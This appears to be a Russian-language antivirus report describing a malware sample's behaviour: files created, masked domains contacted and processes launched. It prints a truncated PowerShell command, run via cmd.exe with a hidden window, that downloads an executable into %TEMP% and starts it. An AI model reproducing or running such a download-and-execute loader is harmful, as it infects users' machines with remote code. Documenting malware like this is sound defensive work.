Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $vixrhxpr как %temp%\pnxgwczudh.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Umfzdqigldp([String] $vixrhxpr){(New-Object System.Net.WebClient).DownloadFile($vixrhxpr,''%TEMP%\Pnxgwczudh.exe'');Start-Process ''%TEMP%\Pnxgwczudh.exe''...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nmgc.bat
Сетевая активность
Подключается к
- 'ba###teks.com':80
TCP
Запросы HTTP GET
- http://ba###teks.com/kperotac.bin
UDP
- DNS ASK ch####hinenow.com
- DNS ASK ba###teks.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Umfzdqigldp([String] $vixrhxpr){(New-Object System.Net.WebClient).DownloadFile($vixrhxpr,''%TEMP%\Pnxgwczudh.exe'');Start-Process ''%TEMP%\Pnxgwczudh.exe''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Nmgc.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Nmgc.bat" "
